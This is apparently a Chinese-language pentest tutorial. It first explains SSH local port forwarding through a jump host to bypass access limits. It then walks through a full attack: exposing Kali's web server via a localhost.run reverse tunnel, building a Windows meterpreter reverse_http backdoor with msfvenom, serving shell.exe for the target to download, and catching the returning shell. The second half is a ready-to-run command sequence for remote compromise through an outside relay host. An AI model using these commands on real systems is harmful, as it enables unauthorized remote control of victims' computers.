将本地机(客户机)的某个端口转发到远端指定机器的指定端口.
-L LocalPort:RemoteHost:RemoteHostPort sshServer
A->C 访问被限制
A-B->C 使用B主机作为跳板突破访问限制
实例:
现在我们使用下面这条命令来达成我们的目的(192.168.0.100上执行)
① ssh -N -f -L 2121:234.234.234.234:21 123.123.123.123
② ftp://localhost:2121
SSH客户端的三个参数:
-N 告诉SSH客户端,这个连接不需要执行任何命令。仅仅做端口转发
-f 告诉SSH客户端在后台运行
-L 做本地映射端口,被冒号分割的三个部分含义分别是 :
需要使用的本地端口号
需要访问的目标机器IP地址(IP: 234.234.234.234)
需要访问的目标机器端口(端口: 21)
最后一个参数是我们用来建立隧道的中间机器的IP地址(IP: 123.123.123.123)
当访问本机的2121的端口时,被加密后转发到123.123.123.123的ssh服务,再解密被转发到234.234.234.234:21
打开kali,输入ssh-keygen
SSH 密钥对可以让你方便的登录到 SSH 服务器,而无需输入密码。由于你无需发送你的密码到网络中,SSH 密钥对被认为是更加安全的方式。再加上使用密码短语 (passphrase) 的使用,安全性会更上一层楼。
这里直接回车使用默认的
service apache2 start 开启apache服务
ssh -R 80:localhost:80 localhost.run 开启远程端口转发
键入yes
获得一个地址:https://06327fbb553a9e.localhost.run这个地址能从任何一个电脑访问到
①kali机
②目标机
生成后门
msfvenom -p windows/meterpreter/reverse_http LHOST=06327fbb553a9e.localhost.run LPORT=80 -f exe -o /var/www/html/shell.exe
把后门文件放在网站目录下方便目标机下载
在目标机上访问https://06327fbb553a9e.localhost.run/shell.exe 下载后门
Service apache2 stop 关闭Apache,因为Apache占用了80端口
在kali上面设置监听
在目标机上运行shell.exe
成功连接